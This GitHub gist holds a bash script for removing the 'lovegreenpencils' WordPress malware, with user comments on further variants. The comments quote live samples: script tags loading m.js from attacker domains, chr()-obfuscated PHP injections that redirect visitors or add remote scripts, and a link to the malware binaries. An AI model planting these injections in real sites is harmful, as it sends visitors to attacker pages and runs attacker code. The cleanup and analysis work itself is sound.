-
-
Save black-dragon74/86fc18a91e814019228c02531f0ea01c to your computer and use it in GitHub Desktop.
#!/bin/bash | |
# Regex to fix DB is: "s/<script[\s\S]*?>[\s\S]*?<\/script>//g" | |
totalInfections=0 | |
filesProcessed=0 | |
echo "Welcome to lovegreenpencils malware fixer by black-dragon74" | |
echo "This fix is divided into 3 phases." | |
echo "Phase 1 fixes the \`beckup\` files." | |
echo "Phase 2 fixes the header injections." | |
echo "Phase 3 fixes the deep rooted JS PHP and JSON injections" | |
echo | |
# Begin phase 1 | |
read -p "Press any key to begin the phase 1: " yay | |
clear | |
echo "Scanning....." | |
for f in $(grep -ril "Element.prototype.appendAfter" ./*); do | |
# Don't fix the fixer itslef :D | |
if [[ $f == "./fix.sh" ]]; then | |
continue; | |
fi | |
# If a backup exists, we created it, don't process it again | |
if [[ $(echo $f | grep ".perlbak") ]]; then | |
continue; | |
fi | |
# Otherwise fix all files recursively | |
echo "Found file $f" | |
echo "Backing up and fixing the infection" | |
echo | |
perl -pi.perlbak -e 's/Element\.prototype\.appendAfter[\s\S]*?\}\)\(\);//gi' "${f}" | |
((filesProcessed ++)) | |
done | |
echo "Phase 1 complete. Processed $filesProcessed files." | |
((totalInfections += filesProcessed)) | |
filesProcessed=0 | |
# Begin phase 2 | |
read -p "Press any key to begin the phase 2: " yay | |
clear | |
echo "Scanning....." | |
for f in $(grep -ril "REQUEST\['lt'\]" ./*); do | |
# Don't fix the fixer itslef :D | |
if [[ $f == "./fix.sh" ]]; then | |
continue; | |
fi | |
# If a backup exists, we created it, don't process it again | |
if [[ $(echo $f | grep ".perlbak") ]]; then | |
continue; | |
fi | |
# Otherwise fix all files recursively | |
echo "Found file $f" | |
echo "Backing up and fixing the infection" | |
echo | |
perl -pi.perlbak -e 's/<\?php\ \$v[\s\S]*?\?>//gi' "${f}" | |
((filesProcessed ++)) | |
done | |
echo "Phase 2 complete. Processed $filesProcessed files." | |
((totalInfections += filesProcessed)) | |
filesProcessed=0 | |
# Begin phase 3 | |
read -p "Press any key to begin the phase 3: " yay | |
clear | |
echo "Scanning....." | |
for f in $(grep -ril "lovegreenpencils" ./*); do | |
# Don't fix the fixer itslef :D | |
if [[ $f == "./fix.sh" ]]; then | |
continue; | |
fi | |
# If a backup exists, we created it, don't process it again | |
if [[ $(echo $f | grep ".perlbak") ]]; then | |
continue; | |
fi | |
# Otherwise fix all files recursively | |
echo "Found file $f" | |
echo "Backing up and fixing the infection" | |
echo | |
perl -pi.perlbak -e "s/<script\ type=\'text\/javascript\'\ src=\'https:\/\/dock\.lovegreenpencils[\s\S]*?<\/script>//gi" "${f}" | |
((filesProcessed ++)) | |
done | |
echo "Phase 3 complete. Processed $filesProcessed files." | |
((totalInfections += filesProcessed)) | |
filesProcessed=0 | |
# Processing complete. | |
echo | |
echo "Found, backed up and fixed $totalInfections infected files." | |
read -p "Processing complete. Press any key to exit. " yay | |
exit 0 | |
The problem in my case turned out to be the Ultimate Member plugin not updated. This malware was using the security flaw in its previous version, already documented in several different posts: https://www.searchenginejournal.com/wordpress-ultimate-member-plugin-vulnerability/387042/
After cleaning the site and updating the plugin, the issue went away and never returned.
Found all these URLs of scripts in posts. Please update.
<script
src='https://flat.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>
<script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script>
<script src='https://drake.strongcapitalads.ga/m.js?n=ns1' type='text/javascript'></script>
<script src='https://cht.secondaryinformtrand.com/m.js?n=ns1' type='text/javascript'></script>
<script src='https://dock.lovegreenpencils.ga/m.js?n=ns1' type='text/javascript'></script>
<script src='https://well.linetoadsactive.com/m.js?n=ns1' type='text/javascript'></script>
<script src='https://start.transandfiestas.ga/m.js?n=ns1' type='text/javascript'></script>
<script src='https://irc.transandfiestas.ga/m.js?n=ns1' type='text/javascript'></script>
<script src='https://stop.transandfiestas.ga/m.js?n=jo1' type='text/javascript'></script>
@ImSeaWorld - You don't happen to have kept one of the malware binaries from your /tmp/ folder? i'm looking at the same problem on one site and i'd like to verify something with the binary...
@ImSeaWorld - You don't happen to have kept one of the malware binaries from your /tmp/ folder? i'm looking at the same problem on one site and i'd like to verify something with the binary...
You're lucky, I just rescued them from the recycle bin.
https://drive.google.com/file/d/1rd1vJjVafyjiaMHjXkrCsd5AYgun-mXh/view?usp=drivesdk
Thank you for posting this information and this script. I found myself wasting the entire day cleaning it up.. I'm so fcking angry that people do sht like this
My site redirect to this url http://main.travelfornamewalking.ga don't know how to fix it
In my case I only change
update wp_options set option_value='http://yoursite.com' where option_name='siteurl';
update wp_options set option_value='http://yoursite.com' where option_name='home';
Amazing thanks you =)
In my case I only change
update wp_options set option_value='http://yoursite.com' where option_name='siteurl';
update wp_options set option_value='http://yoursite.com' where option_name='home';
Be careful with that- this thing pops a lot of back doors and javascript down where it can.. it needs to be cleaned out entirely, as the site forwarding is the least malicious thing it does.
I have found a new variation that is getting injected into a couple hundred files. I attempted to download your tool and update it to the new variation I found but it seems like I am doing it wrong.
Here is the new variation:
<?php $a="h"."ea"."der";$a(chr(76).chr(111).chr(99).chr(97).chr(116).chr(105).chr(111).chr(110).chr(58).chr(32).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(105).chr(114).chr(99).chr(46).chr(108).chr(111).chr(118).chr(101).chr(103).chr(114).chr(101).chr(101).chr(110).chr(112).chr(101).chr(110).chr(99).chr(105).chr(108).chr(115).chr(46).chr(103).chr(97).chr(47).chr(53).chr(53).chr(114).chr(121).chr(101).chr(114).chr(121).chr(63).chr(105).chr(100).chr(61).chr(50).chr(50).chr(53).chr(56).chr(52).chr(38).chr(114).chr(115).chr(61).chr(50).chr(51).chr(52).chr(54));?>
Do you have cPanel on your hosting account ? If yes, you should have Terminal app to launch thoses commands
I’m trying to update the code to find the chr, but I’m not making it. Someone now how can add the new variation? I trying with this code.for f in $(grep -ril "\$a=chr.*>"); do
I’m trying to update the code to find the chr, but I’m not making it. Someone now how can add the new variation? I trying with this code.
for f in $(grep -ril "\$a=chr.*>"); do
Hello,
I wrote a post (in french) : https://www.vinvin.dev/piratage-de-site-wordpress-cas-des-redirections-lovegreenpencils/
Maybe u can use this : grep -ril '$a="h"."ea"."der"' ./*
to find the new variation ?
I’m trying to update the code to find the chr, but I’m not making it. Someone now how can add the new variation? I trying with this code.
for f in $(grep -ril "\$a=chr.*>"); do
Hello,
I wrote a post (in french) : https://www.vinvin.dev/piratage-de-site-wordpress-cas-des-redirections-lovegreenpencils/
Maybe u can use this :grep -ril '$a="h"."ea"."der"' ./*
to find the new variation ?
Thank you! I will try this.
If think I found the plugin that have the backdoor. Is a nuked version of elementor Pro
Usually, the hacker infect large amount of file. Beware and launch the grep command on root directory.
Check if you haven't file call "lte_" or something on the root then check if you haven't got any maintenance.php or maintenance folder or wp-sheeep on plugin folder also check if you don"t have wp-stream.php file on root as well.
The best thing I thinks once the cleaning done, its to export DB, Export uploads/ themes/ plugins/ and reinstall fresh WP.
I am seeing a trend of a new variation of char code being used.
<?php echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).chr(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(32).chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(115).chr(116).chr(111).chr(114).chr(101).chr(46).chr(100).chr(111).chr(110).chr(116).chr(107).chr(105).chr(110).chr(104).chr(111).chr(111).chr(111).chr(116).chr(46).chr(116).chr(119).chr(47).chr(100).chr(101).chr(115).chr(116).chr(105).chr(110).chr(97).chr(116).chr(105).chr(111).chr(110).chr(46).chr(106).chr(115).chr(63).chr(122).chr(61).chr(105).chr(38).chr(105).chr(100).chr(61).chr(49).chr(49).chr(50).chr(38).chr(99).chr(108).chr(105).chr(100).chr(61).chr(53).chr(49).chr(50).chr(38).chr(115).chr(105).chr(100).chr(61).chr(55).chr(56).chr(57).chr(54).chr(51).chr(52).chr(53).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(62); ?>
subdomain changes, found on my buddies wp site as
port.lovegreenpencils.ga
Also added into the header links
https://lovegreenpencils.ga/det.php?sit=flex&sid=3&yuid=1&
Stored in
wp_options
there's 2 values changed,site_url
andhome
given 2 different URL structures:I had a ton of hits by searching 'lovegreenpencils' as a char code, credits
Functions that are appended onto every main script
After clearing out all the javascript additions, I found the shell on an older installation of WordPress. The API was the only thing that was legible to me. There was alternate backdoors sprinkled throughout the build. I ran
wp core verify-checksums
which resulted in loads of invalid checksums(Note: this doesn't find everything) but will show you all the files that shouldn't be in the filesystem.Some of the files had the comment
//scp-173
as well asecho 'I love you,how about you';
This function can decode the hex to a string for those curious. credits
I've found some more functions appended onto files like
wp-load.php
This is another backdoor to remove.Another backdoor hiding in
.cagefs/tmp
under various random names.